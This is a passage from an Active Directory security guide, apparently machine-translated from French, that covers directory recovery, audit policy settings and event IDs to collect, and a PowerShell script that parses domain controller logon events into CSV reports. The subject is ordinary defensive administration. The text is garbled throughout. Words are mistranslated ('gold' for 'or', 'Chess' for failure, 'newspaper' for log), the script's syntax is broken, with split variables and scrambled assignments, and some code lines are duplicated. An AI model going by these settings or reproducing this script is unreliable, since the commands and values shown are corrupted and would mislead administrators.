/ forceremoval on all domain controllers that have not been copied. For this, we will use the tool Ntdsutil and follow the procedures below:

http://support.microsoft.com/kb/255504/en-us
http://support.microsoft.com/kb/216498/en-us
http://support.microsoft.com/kb/230306 http: /
/support.microsoft.com/kb/887424/fr

6.11.4.4 Step 3: restoration of business applications that rely on the directory

To test our image, it is necessary to restore critical applications on the model environment. Applications such as Exchange hosting their
configuration at the Active Directory can be restored mode Disaster Recovery.

Msreport - Guillaume MATHIEU - All rights reserved


/ disasterrecovery
With Exchange 2007: setup.com / RecoverServer

You can now test your new Windows image in the qualification environment.

6.11.5 Q SOME RETURNS TO EXPERIENCE ON DEPLOYMENT W INDOWS 2012 R2

1. The keyboard configuration is done from the Control Panel | Language ( choice of language and keyboard) and in Control Panel | Region ( setting
the default keyboard at logon by checking the box Welcome screen and system accounts).

However, if you installed a Core server mode and then activated the GUI functionality this setting is not retained. I then prompts you to add the
new keyboard in French (by temporarily adding another type of keyboard). Do not forget then to redefine the correct keyboard for Welcome
Screen.

For more information : http://support.microsoft.com/kb/3002327

2. Some features like the .Net Framework 3.5.1 refuse to install because it lacks the installation sources. This problem is an installation Full or
Core. To correct this problem, use the directory sources \ SxS the installation DVD.

Msreport - Guillaume MATHIEU - All rights reserved With Exchange 2003: setup.exe
Msreport - Guillaume MATHIEU - All rights reserved
7 IMPLEMENTING POLICY RISK PREVENTION
To anticipate attacks and their consequences, it is necessary to be proactive and to put in place the following measures:

• Audit changes made to the directory and access attempts.


• Supervise your directory to detect malfunctions that could be linked to the attacks.

• Protect backups of Active Directory and MFIs media ( Install From Media).
An attacker can indeed recover passwords for user accounts and computer accounts if it has the NTDS.DIT ​and SYSTEM files.

• Preparing a disaster recovery plan in case of compromise of the directory.

7.1 Audit CHANGE (NEW ITEMS) AND DRAW THE SIGN AT THE DIRECTORY ACTIVE DIRECTORY AUDIT WITH WINDOWS

The audit to generate entries in the domain controllers of the security log. It allows monitoring among other actions performed by the directory
administration teams or to trace authentication requests.

The ANSSI wrote a white paper that details the audit settings to be deployed in an Active Directory domain. This organization also recommends
enabling advanced logging (segmented into subcategories) appeared with Windows 2008 R2.

https://www.ssi.gouv.fr/uploads/IMG/pdf/NP_ActiveDirectory_NoteTech.pdf
https://technet.microsoft.com/en-us/library/dn319056(v=ws.11).aspx

the parameter computer | Policies | Windows Settings | Security Settings | Local Policies | Security options | Audit: Force audit policy
subcategory settings (Windows Vista or later) must be activated at the Default Domain Policy and Default Domain Controller Policy to force the
advanced audit policy and disable the classic audit strategies as described in the articles:

https://www.petri.com/enable-advanced-audit-policy-configuration-windows-server

The Domain Controller Security log must be configured with a maximum size of 4 GB and an automatic log rotation (if the log is full, the older
entries are deleted to allow the creation of new entries). For this, the following GPO settings must be defined:

Computer Configuration | Policies | Windows Settings | Security Settings | Logs Events | Maximum security log size: to the value 2048000 .

Computer Configuration | Policies | Windows Settings | Security Settings | Logs Events | Retention method for security log: to the value Overwrite
events as needed .

The strategy Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies | Security options | Audit: Shut down
system time immediately if Unable to log security audit must also be disabled.

Enabling all parameters recommended by ANSSI can greatly increase the size of the log Security . After the implementation of these settings,
some customers no longer possessed only 30 minutes from logs with a newspaper Security configured with a maximum size of 2GB.

Msreport - Guillaume MATHIEU - All rights reserved


Category Audit Event Parameter audit
Credential Validation Successes and Failures
Kerberos Authentication Service Successes and Failures
Account Logon
Kerberos Service Ticket Operations Successes and Failures
Other Account Logon Events Successes and Failures
Application Group Management Successes and Failures
Computer Account Management Successes and Failures
Account Distribution Group Management Successes and Failures
Management Other Account Management Events Successes and Failures
Security Group Management Successes and Failures
User Account Management Successes and Failures
DPAPI Activity Successes and Failures
process Creation Successes and Failures
Detailed Tracking
process Termination No audit
RPC Events No audit
Detailed Directory Service
No audit
Replication
Directory Service Access Successes and Failures ( 1)
DS Access Active Directory Services Changes No audit

Directory Service Replication Successes and Failures

Account Lockout Successes and Failures


IPsec Extended Mode No audit
IPsec Main Mode No audit
IPsec Quick Mode No audit
Logon / logoff logoff Achievements

Logon Successes and Failures


Network Policy Server Successes and Failures
Other Logon / Logoff Events Successes and Failures
special Logon Successes and Failures
Generated Application Undefined ( 3)
certification Services Undefined ( 3)
Detailed File Share Undefined ( 3)
File Share Undefined ( 3)
File System Undefined ( 3)
Windows Filtering Platform Undefined ( 3)
Connection
Object Access
Windows Filtering Platform Packet Drop Undefined ( 3)

handle Manipulation Undefined ( 3)


kernel Object Undefined ( 3)
Other Object Access Events Successes and Failures
Registry Undefined ( 3)
SAT Undefined ( 3)
Audit Policy Change Successes and Failures ( 2)
Authentication Policy Change Successes and Failures ( 2)
Authorization Policy Change Successes and Failures ( 2)
Policy Change
Filtering Platform Policy Change Successes and Failures ( 2)
MPSSVC Rule-Level Policy Change Successes and Failures ( 2)
Other Policy Change Events Chess
Not Sensitive Privilege Use No audit
Privilege Use Audit Other Privilege Use Events No audit
Sensitive Privilege Use No audit
IPsec Driver No audit
System Other System Events Successes and Failures
Security State Change Achievements

Msreport - Guillaume MATHIEU - All rights reserved


Security System Extension Achievements

System Integrity Successes and Failures


Global Object Access Audit file system global object access Uncertain Global Audit object
Auditing access registry Undefined

legend:
• ( 1): this generates many messages ID 4662 Directory Service Access ().
• ( 2): this generates top posts ID 5447 (Policy Change Events).
• ( 3): left undefined (instead of No auditing) to allow enable auditing of files / registry entries on servers in each case.

All parameters in Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies will be set as shown below but will
be ignored unless you still have Windows 2003 domain controllers.

Settings Configuration
Audit system events Successes and Failures
Audit process tracking Successes and Failures
Audit privilege use Undefined
Audit policy change Successes and Failures
Audit object access Undefined
Audit logon events Successes and Failures
Audit directory service access Successes and Failures
Audit account management Successes and Failures
Audit account logon events Successes and Failures

Same settings to domain controllers will be applied on workstations and member servers in the domain.

Msreport - Guillaume MATHIEU - All rights reserved


7.2 ANALYZE THE JOURNAL SECURITY

For this, we use a PowerShell script called AuditConnexion . This script requires that audits 4 parameters below are enabled:

Account Logon \ Credential Validation: ID 4776 and 4777 Account Logon \ Kerberos Authentication
Service: ID 4768, 4771, 4772 Account Logon \ Kerberos Service Ticket Operations: 4769, 4770
Logon / Logoff \ Audit logon: ID 4624, 4625, 4648

The table below lists the ID to be collected on the domain controllers

ID Protocol (s) Interest


Tracer successful logons to the field. When a user logs on, it connects to shares

4624 All Netlogon and Sysvol the domain controller and therefore generates a logon network types Domain
controllers (diverted method for detecting a logon).

Lets see logon failures when an administrator logs on to the domain controller directly (MSTSC)
or when a service running on a domain controller does not start because of a problem login /
4625 All password password.

Detects a secondary logon as starting a service / Scheduled Task or use a tool like LDP.EXE to
make a connection LDAP Simple Bind the
4648 All

Domain Controller (explicit connection with login / password).


Can trace who logs. A Windows machine generates a new TGT when a user logs on. The 4768
4768 list ID requests TGT in success and failure.

Used to trace the activity of a user by listing the resources to which it connects (Kerberos).
4769

Can trace that logs (renewal of TGT).


4770
Kerberos
Used to trace login failures (TGT generation of chess at the pre-authentication).
4771

Used to trace login failures (failures generation TGT after the pre-authentication). This event is very
rare because the Kerberos failures are at the phase called pre-authentication (bad login / password
4772 ...).

This event will not be collected by the PowerShell script.


All but Used to trace the activity of a user by listing the resources to which it connects (everything
4776
Kerberos except Kerberos).

The solution is based on a first script that copies the Security log of each domain controller on a calculation server.

Then you run the PowerShell script and Pass in the domain controller's name and EVTX file to analyze. example:

C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -ExecutionPolicy Bypass -File D: \ _ adm \ AuditConnexion \
AuditConnexion.ps1 -DC DC1 -DossierAuditConnexion D: \ _ adm \ AuditConnexion \ -EventName DC1.evtx

Msreport - Guillaume MATHIEU - All rights reserved


PowerShell script:
This script allows to analyze the Domain Controllers security logs on a remote machine (other than a domain controller). The script must be run
with 3 settings (required):

• The name of the solution folder


• The file name EVTX
• The domain controller name.

This operation predicts export log Security ( EVTX file) several times a day on domain controllers whose newspaper Security does not contain 24
hours of logs.

Just name the file EVTX NON-DC-HH-MM for example. example:


-DC AuditConnexion.ps1 DC1 -DossierAuditConnexion D: \ _ adm \ AuditConnexion \ -EventName DC1.evtx

The script creates subfolders Job and Results automatically. The result file shows the date of the last
event of EVTX newspaper.
The Events folder containing the event logs must be created manually. You have to manually create a sub folder with the domain controller
name.

The following script (agent) must be running on the domain controllers to copy the file to the computing server (called here serveurrapport ).

serveurrapport del \\ \ Events $ \ NAME-DC \ DC1.evtx


wevtutil epl Security serveurrapport \\ \ Events $ \ NON-DC \ DC1.evtx

We must determine the time required to copy the file EVTX the Analysis Server and schedule this task before launching the main script (usually
10 minutes).

The script generates a zip file using a third PowerShell function (this prevents the V5 PowerShell prerequisites).

The script is based on the command wevutil instead of the control Get-WinEvent which is far too slow. Examples of commands with wevtutil tool:

wevtutil qe / lf: True "C: \ _ adm \ Scripts \ AuditConnexionV12 \ Security-DC1.evtx"


"/ Q * [System [(EventID = 4624 gold EventID EventID = 4625 Gold = 4768 gold EventID EventID = 4771 Gold = 4776 gold EventID = 4648)]]" |
foreach {}

wevtutil qe / lf: True "C: \ _ adm \ Scripts \ AuditConnexionV12 \ Security-DC1.evtx"


"/ Q * [System [(EventID = 4624 gold EventID EventID = 4625 Gold = 4768 gold EventID EventID = 4771 Gold = 4776 gold EventID = 4648)]]" |
Select -First 200000 | foreach {}

wevtutil qe / lf: True "C: \ _ adm \ Scripts \ AuditConnexionV12 \ Security-DC1.evtx" "/ q * [System
[(EventID = 4648)]]" | Select -First 1

The script has a variable $ MaxResultatZipSize which allows to define if we send a link or attachment depending on the size of the ZIP file.

The script has a variable $ MaxResultatSize which can cut the work files that exceed a certain size. Excel can not open a file of more than 1
million rows.

The writing of the disk is made by block lines X (variable $ EcritureNbLigne ). This optimizes greatly the speed of execution of the script and
reduces I / O required.

It is recommended to make entries in blocks of 10,000 lines. Be careful not to saturate the server memory (PowerShell process) when used for
larger blocks.

The script will saturate a heart 100%. The generation server reports must therefore have multiple cores (minimum 2).

The script has an instruction PowerShell force to clear its memory. It is performed when the main job file is written to disk.

Msreport - Guillaume MATHIEU - All rights reserved


written using the following articles:
https://blogs.msdn.microsoft.com/monad/2005/11/30/using-culture-culture-culture-script-scriptblock/
https://blogs.technet.microsoft.com/heyscriptingguy/2011/03/ 08 / how-to-Improve-the-performance-of-apowershell-event-log-query /

https://gist.github.com/gravejester/b16bab17b80619f2b964
https://communary.net/2015/12/13/observations-on-writing-to-screen-and-file-in-powershell/ http://ss64.com/ps/zip.txt

http://stackoverflow.com/questions/14827716/adding-a-complete-directory-to-an-existing-zip-file-withsystem-io-compression-f

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4768
http://my-powershell.fr/aide-memoire-powershell
http://www.ehow.com/how_7719350_split-string-two-variables-powershell.html
http://technet.microsoft.com/fr-FR/library/dd772712(WS.10).aspx
https://social.technet.microsoft.com/Forums/windows/en-US/6f158957-28ea-4ce9-a688ccfa7bbd16bd/wevtutil-command-options-for-date?forum=w7itprogeneral

Script source code:

# ------------------------------------------ #
# Script Parameters
# ------------------------------------------ #

param (
[STRING] $ DC
[STRING] $ DossierAuditConnexion [STRING] $
EventName
)

echo "The script must be run with 3 settings (Required)" echo "Do not forget the \ at the end of the road for DossierAuditConnexion
parameter!" echo "Example: AuditConnexion.ps1 -DC DC1 -DossierAuditConnexion D: \ _ adm \ AuditConnexion \ EventName DC1.evtx"

# ------------------------------------------ #
# variables
# ------------------------------------------ #

# Location of the event log


$ = $ EventFile DossierAuditConnexion + "Events \" $ + DC + "\" + $ EventName

# Reference date: recovering the date of the last event. DateReference = $ (Get-WinEvent -Path $ EventFile |
-First select 1) .timeCreated

# It retrieves the events of the last 24 hours + 1 minutes DateDebutTemp $ = (Get-Date -Date $ DateReference) .AddMinutes
(-1441) $ StartDate = "" + (Get-Date $ -Date DateDebutTemp -Format 'yyyy-MM -ddTHH: mm: ss') + ""

# One term analuse the date of the last log


$ EndDate = "" + (Get-Date $ -Date DateReference -Format 'yyyy-MM-DDThh: mm: ss') + "'"

# Temporary Working Folder


$ = $ DossierTravail DossierAuditConnexion + "Work \" + $ EventName + "\"

# record results
$ = $ DossierResultats DossierAuditConnexion + "Results \" + $ EventName + "\"

# files results

Msreport - Guillaume MATHIEU - All rights reserved This script was


Result = $ $ $ DossierTravail + DC + "- AuditConnection -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $
DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4624 DossierTravail = $ + $ + DC "- AuditConnection_ID4624 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4625 DossierTravail = $ + $ + DC "- AuditConnection_ID4625 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4768 DossierTravail = $ + $ + DC "- AuditConnection_ID4768 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4769 DossierTravail = $ + $ + DC "- AuditConnection_ID4769 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4771 DossierTravail = $ + $ + DC "- AuditConnection_ID4771 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4776 DossierTravail = $ + $ + DC "- AuditConnection_ID4776 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4648 DossierTravail = $ + $ + DC "- AuditConnection_ID4648 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

# Result file in ZIP format


$ ResultatZip DossierResultats = $ + $ + DC "- AuditConnection -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" +
$ DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".zip"

# Link to file $ result = ResultatZipLink "\\ serveurrapport \ results $ \ "+ $ EventName +" \ "+ $ + DC" - AuditConnection - "+ $
DateReference.Year +" - "+ $ DateReference.Month +" - "+ $ DateReference.Day + '_' + + $ DateReference.Hour "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".zip"

# Maximum size of output file in the file in bytes work MaxResultatSize $ = 104857600

# $ MaxResultatSize = 24857600

# Index for naming files results in the work folder (set to 1) $ Index = 1 $ = 1 Index4776 Index4768 $ 1 = $ 1 =
Index4769 Index4771 $ 1 = $ 1 = Index4624 Index4625 $ 1 = $ 1 = Index4648

# Maximum size of the zip file in bytes


# $ MaxResultatZipSize = 1097150 $
MaxResultatZipSize = 199715000

# Sender of the email $ From = " $DC@msreport.fr


"

# Recipient's email (@ $ To = ( " guillaume.mathieu@metsys.fr ") $ @ To = (" guillaume.mathieu@metsys.fr


")

# Mail server

Msreport - Guillaume MATHIEU - All rights reserved


$ SMTPServer = " srvexch.msreport.fr "

# Title of email
$ Title = "Audit successful authentication requests and failures on $ DC"

# Number of events to be analyzed before writing the results files


# This parameter determines the memory requirements of PowerShell to run the script $ EcritureNbLigne = 10000

# ------------------------------------------------------------------------------- #
# Prerequisite check and creation of output files
# The EVTX file must exist.
# The working folder and the results of file are created if necessary.
# If the script sends an email and stops.
# ------------------------------------------------------------------------------- #

if ((Test-Path $ EventFile) True -do $) {

# Send an alert $ format = "<style>"

$ = $ + Format Format "</ style>" $ Body =


"<P> Hello </ P>"
$ $ Body = Body + "<P> An error occurred while generating the report on authentication requests to the domain controller $ DC. Files or
missing work files. </ P>" $ Body $ = Body + "<P> Regards </ P>"

$ $ Body = Body + "<P> The IT team Msreport </ P>" $ ratio = ConvertTo-Html Title -Title -Body
$ $ $ Body -head Format
Send-MailMessage $ -To To -subject "Audit successful authentication requests and failed on $ CD" -Body "$ Report" -SmtpServer $
SMTPServer -From From $ -BodyAsHtml -Encoding ([System.Text.Encoding] :: UTF8)

# Stopping the Exit}


else {script

# Deleting the working folder if it exists. The file is recreated vacuo. Remove-Item $ DossierTravail
-Recurse -Force: $ True New-Item -Path $ DossierTravail -itemtype Directory -Force

# Removing the output file if it already exists (it restarts the job for the same event log). if ((Test-Path $ ResultatZip) -eq $ True) {

Remove-Item $ ResultatZip -Force}

# Creating the domain controller Results folder if it does not exist. if ((Test-Path $ DossierResultats)
True -do $) {

New-Item $ -Path DossierResultats -itemtype Directory -Force}}

# ----------------------------------------------------------------- #
# Creation results files with headers
# Creating result tables (stored in memory lines)
# ----------------------------------------------------------------- #

# common result file to all ID

Msreport - Guillaume MATHIEU - All rights reserved


"DC; Status; Date; EventId; User; Domain; ServiceName; LogonProcessName; AuthenticationPackageNam e; LmPackageName; Ip Address" |
Out-File $ Result = $ TableResultat New-Object System.Collections.Generic.List [string]

# Result file with the ID 4776


"DC; Status; Date; EventId; PackageName; TargetUserName; Workstation; StatusDetail" | Out-File $ Resultat4776

$ TableResultat4776 = New-Object System.Collections.Generic.List [string]

# File result for ID 4624


"DC; Status; Date; EventId; SubjectUserSid; SubjectUserName; SubjectDomainName; SubjectLogonId; Tar getUserSid; TargetUserName;
TargetDomainName; TargetLogonId; LogonType; LogonProcessName; Aut henticationPackageName; WorkstationName; LogonGuid;
LmPackageName; keyLength; ProcessId; KEYL ength; ProcessName; IpAddress; ipport "| Out-File $ Resultat4624 $ TableResultat4624 =
New-Object System.Collections.Generic.List [string]

# File result for ID 4625


"DC; Status; Date; EventId; SubjectUserSid; SubjectUserName; SubjectDomainName; SubjectLogonId; Tar getUserSid; TargetUserName;
TargetDomainName; StatusCode; FailureReason; SUBSTATUS; LogonType; LogonProcessName; AuthenticationPackageName;
WorkstationName; TransmittedServices; LmPackag eName; keyLength; ProcessId; ProcessName; IpAddress ; ipport "| Out-File $
Resultat4625 $ TableResultat4625 = New-Object System.Collections.Generic.List [string]

# File result for ID 4768


"DC; Status; Date; EventId; TargetUserName; TargetDomainName; TargetSid; ServiceName; ServiceSid; Ti cketOptions; Status;
TicketEncryptionType; PreAuthType; IpAddress; ipport; CertIssuerName; CertSerialN umber; CertThumbprint" | Out-File $ Resultat4768

$ TableResultat4768 = New-Object System.Collections.Generic.List [string]

# File result for ID 4769


"DC; Status; Date; EventId; TargetUserName; TargetDomainName; ServiceName; ServiceSid; TicketOptio ns; TicketEncryptionType;
IpAddress; ipport; LogonGuid; TransmittedServices" | Out-File $ Resultat4769 $ TableResultat4769 = New-Object
System.Collections.Generic.List [string]

# File result for ID 4771


"DC; Status; Date; EventId; TargetUserName; TargetSid; ServiceName; TicketOptions; PreAuthType; IpAdd ress; ipport; CertIssuerName;
CertSerialNumber; CertThumbprint" | Out-File $ Resultat4771 $ TableResultat4771 = New-Object System.Collections.Generic.List [string]

# File result for ID 4648


"DC; Status; Date; EventId; SubjectUserSid; SubjectUserName; SubjectDomainName; SubjectLogonId; Lo gonGuid; TargetUserName;
TargetDomainName; TargetLogonGuid; targetServerName; TargetInfo; Proc Essid; ProcessName; IpAddress; ipport" | Out-File $
Resultat4648 $ TableResultat4648 = New-Object System.Collections.Generic.List [string]

# ------------------------------------------------- #
# Generate $ Result file
# ------------------------------------------------- #
wevtutil qe / lf: $ EventFile True "/ q * [System [(EventID = 4624 = 4625 gold EventID EventID = 4768 gold gold gold EventID = 4769 =
EventID EventID = 4771 gold 4776 gold EventID = 4648) and TimeCreated [@SystemTime > = $ StartDate and @SystemTime <= $
EndDate]]] "| {foreach
# Create the XML variable with the contents of the log. [XML] $ XML = ($ _)

# Event ID 4776 Analysis: if ($ xml.Event.System.EventID


-eq "4776") {

$ = $ DCEvent XML.Event.System.Computer Status = $ $ $ Date = $


XML.Event.System.Keywords xml.Event.System.TimeCreated.SystemTime

Msreport - Guillaume MATHIEU - All rights reserved


$ = $ EventId xml.Event.System.EventID
PackageName $ = $ XML.Event.EventData.Data [0]. '# Text' $ TargetUserName =
$ XML.Event.EventData.Data. [1] '# text' $ = $ XML.Event.EventData.Data
Workstation [ 2]. '# text' $ StatusDetail = $ XML.Event.EventData.Data. [3] '# text'

If (! ($ TargetUserName.Contains ( "$"))) {

if ($ Status -eq "0x8020000000000000") {

$ Status = "Success Audit"}

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; TargetUserName ;;;; $ $ $ PackageName ;; Work Station")

# Writing the specific file for the ID 4776


$ TableResultat4776.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ PackageName; $ TargetUserName; $ Wo rkstation; $ StatusDetail")}}

# Event ID 4624 Analysis elseif ($ xml.Event.System.EventID


-eq 4624) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.System.Keywords
if ($ Status -eq "0x8020000000000000") {$ Status = "Success Audit"} = $ $ Date $
xml.Event.System.TimeCreated.SystemTime EventId = $ xml.Event.System.EventID

$ = $ SubjectUserSid XML.Event.EventData.Data [0]. '# Text' $ SubjectUserName = $


XML.Event.EventData.Data. [1] '# text' $ SubjectDomainName = $ XML.Event.EventData.Data [ 2]. '#
text' $ SubjectLogonId = $ XML.Event.EventData.Data. [3] '# text' $ TargetUserSid = $
XML.Event.EventData.Data. [4] '# text' $ = $ TargetUserName XML .Event.EventData.Data. [5] '#
text' $ TargetDomainName = $ XML.Event.EventData.Data. [6] '# text' $ TargetLogonId = $
XML.Event.EventData.Data [7]. '# text '= $ LogonType $ XML.Event.EventData.Data. [8]' # text '$
LogonProcessName = $ XML.Event.EventData.Data. [9]' # text '$ AuthenticationPackageName = $
XML.Event.EventData. Data [10]. '# text' $ WorkstationName = $ XML.Event.EventData.Data. [11] '#
text' $ LogonGuid = $ XML.Event.EventData.Data. [12] '# text' = $ TransmittedServices $
XML.Event.EventData.Data. [13] '# text' $ LmPackageName = $ XML.Event.EventData.Data. [14] '#
text' $ keyLength = $ XML.Event.EventData.Data. [15] '# text 'ProcessId $ = $
XML.Event.EventData.Data. [16]' # text '$ ProcessName = $ XML.Event.EventData.Data. [17]' # text
'$ IpAddress = $ XML.Event.EventData.Data [18]. '# text' $ ipport = $ XML.Event.EventData.Data.
[19] '# text'

# Exclude entries whose user name is the name of a computer account. If (! ($ TargetUserName.Contains (
"$"))) {

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetDomainName ;; L $ ogonProcessName; $
AuthenticationPackageName; $ LmPackageName; $ IpAddress")

# Writing the output file for the ID 4624

Msreport - Guillaume MATHIEU - All rights reserved


$ TableResultat4624.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ SubjectUserSid; $ SubjectUserName; S $ ubjectDomainName; $
SubjectLogonId; $ TargetUserSid; $ TargetUserName; $ TargetDomainName; $ Targ etLogonId; $ LogonType; $ LogonProcessName; $
AuthenticationPackageName; $ WorkstationName; $ Log onGuid; $ LmPackageName; $ keyLength; $ ProcessId; $ keyLength; $
ProcessName; $ IpAddress; $ ipport ")}}

# Event ID 4625 Analysis elseif ($ xml.Event.System.EventID


-eq 4625) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.System.Keywords
if ($ Status -eq "0x8010000000000000") {$ status = "Audit Failure"} = $ $ Date $
xml.Event.System.TimeCreated.SystemTime EventId = $ xml.Event.System.EventID

$ = $ SubjectUserSid XML.Event.EventData.Data [0]. '# Text' $ SubjectUserName = $


XML.Event.EventData.Data. [1] '# text' $ SubjectDomainName = $ XML.Event.EventData.Data [ 2]. '#
text' $ SubjectLogonId = $ XML.Event.EventData.Data. [3] '# text' $ TargetUserSid = $
XML.Event.EventData.Data. [4] '# text' $ = $ TargetUserName XML .Event.EventData.Data. [5] '# text' $
TargetDomainName = $ XML.Event.EventData.Data. [6] '# text' $ StatusCode = $
XML.Event.EventData.Data [7]. '# text '= $ FailureReason $ XML.Event.EventData.Data. [8]' # text '$
sUBSTATUS = $ XML.Event.EventData.Data. [9]' # text '$ LogonType = $ XML.Event.EventData. Data
[10]. '# text' $ LogonProcessName = $ XML.Event.EventData.Data. [11] '# text' $
AuthenticationPackageName = $ XML.Event.EventData.Data. [12] '# text' = $ WorkstationName $
XML.Event.EventData.Data. [13] '# text' $ TransmittedServices = $ XML.Event.EventData.Data. [14] '#
text' $ LmPackageName = $ XML.Event.EventData.Data. [15] '# text' $ keyLength = $
XML.Event.EventData.Data. [16] '# text' $ ProcessId = $ XML.Event.EventData.Data. [17] '# text' $
ProcessName = $ XML.Event.EventData.Data [18 ]. '# text' $ IpAddress = $ XML.Event.EventData.Data.
[19] '# text' $ ipport = $ XML.Event.EventData.Data. [20] '# text'#text 'ipport $ = $
XML.Event.EventData.Data. [20]' # text '#text 'ipport $ = $ XML.Event.EventData.Data. [20]' # text '

# Exclude entries whose user name is the name of a computer account. If (! ($ TargetUserName.Contains (
"$"))) {

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetDomainName ;; L $ ogonProcessName; $
AuthenticationPackageName; $ LmPackageName; $ IpAddress")

# Writing the output file for the ID 4625


$ TableResultat4625.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ SubjectUserSid; $ SubjectUserName; S $ ubjectDomainName; $
SubjectLogonId; $ TargetUserSid; $ TargetUserName; $ TargetDomainName; $ Status sCode; $ FailureReason; $ SUBSTATUS; $
LogonType; $ LogonProcessName; $ AuthenticationPackageName; $ WorkstationName; $ TransmittedServices; $ LmPackageName; $
keyLength; $ ProcessId; ProcessNam $ e, $ IpAddress; $ ipport ")}}

# Analysis of the 4768 events (Kerberos authentication) elseif ($


xml.Event.System.EventID -eq 4768) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.EventData.Data. [6] '# text' $ date = $
xml.Event.System.TimeCreated.SystemTime

Msreport - Guillaume MATHIEU - All rights reserved


$ = $ EventId xml.Event.System.EventID
$ = $ TargetUserName XML.Event.EventData.Data [0]. '# Text' $ TargetDomainName =
$ XML.Event.EventData.Data. [1] '# text' $ TargetSid = $ XML.Event.EventData.Data [ 2].
'# text' $ ServiceName = $ XML.Event.EventData.Data. [3] '# text' $ ServiceSid = $
XML.Event.EventData.Data. [4] '# text' $ = $ TicketOptions XML .Event.EventData.Data.
[5] '# text' $ TicketEncryptionType = $ XML.Event.EventData.Data. [7] '# text' $
PreAuthType = $ XML.Event.EventData.Data [8]. '# text '$ IpAddress = $
XML.Event.EventData.Data. [9]' # text '$ ipport = $ XML.Event.EventData.Data. [10]' #
text '$ CertIssuerName = $ XML.Event.EventData. Data [11]. '# text' $ CertSerialNumber
= $ XML.Event.EventData.Data. [12] '# text' $ CertThumbprint = $
XML.Event.EventData.Data. [13] '# text'

# Exclude entries whose user name is the name of a computer account. If (! ($ TargetUserName.Contains (
"$"))) {

# Analyze the error code / status


if ($ Status -eq "0x0") {$ Status = "Success - 0x0"}
elseif ($ Status -eq "0x1") {$ status = "Failure - 0x1 - Customer's entry in database has expired"} elseif ($ Status -eq "0x2") {$ status = "Failure - 0x2 - Server's entry in database has expired "}

elseif ($ Status -eq" 0x3 ") {$ status =" Failure - 0x3 - Requested protocol version not supported # "} elseif ($ Status -eq" 0x4 ") {$ status =" Failure - 0x4 - Client's key encrypted in old master

key "} elseif ($ Status -eq" 0x5 ") {$ status =" Failure - 0x5 - Server's key encrypted in old master key "} elseif ($ Status -eq" 0x6 ") {$ Status = "Failure - 0x6 - Client not found in Kerberos

database"} elseif ($ Status -eq "0x7") {$ status = "Failure - 0x7 - Server not found in Kerberos database"} Elseif ($ Status -eq "0x8") {$ status = "Failure - 0x8 - Senior Multiple entries in

database"} elseif ($ Status -eq "0x9") {$ status = "Failure - 0x9 - The customer server or : has a null key "} elseif ($ Status -eq" 0xA ") {$ status =" Failure - 0xA - Ticket not eligible for

postdating "} elseif ($ Status -eq" 0xB ") {$ status =" Failure - 0xB - Requested start time is later than end time "} elseif ($ Status -eq" 0xC ") {$ status =" Failure - 0xC - KDC policy rejects

request (Could Be workstation restrictions) "}} Elseif ($ Status -eq "0xA") {$ status = "Failure - 0xA - Ticket not eligible for postdating"} elseif ($ Status -eq "0xB") {$ status = "Failure - 0xB -

Requested start time is later than end time "} elseif ($ Status -eq" 0xC ") {$ status =" Failure - 0xC - KDC policy rejects request (Could Be workstation restrictions) "}} Elseif ($ Status -eq

"0xA") {$ status = "Failure - 0xA - Ticket not eligible for postdating"} elseif ($ Status -eq "0xB") {$ status = "Failure - 0xB - Requested start time is later than end time "} elseif ($ Status -eq"

0xC ") {$ status =" Failure - 0xC - KDC policy rejects request (Could Be workstation restrictions) "}

elseif ($ Status -eq "0xD") {$ status = "Failure - 0xD - KDC can not Accommodate requested option"} elseif ($ Status -eq "0xE") {$ status =
"Failure - 0xE - KDC Has No Support for encryption-type "} elseif ($ Status -eq" 0xF ") {$ status =" Failure - 0xF - KDC Has No Support for
checksum kind "} elseif ($ Status -eq" 0x10 ") {$ status =" Failure - 0x10 - KDC Has No Support for padata kind "} elseif ($ Status -eq" 0x11
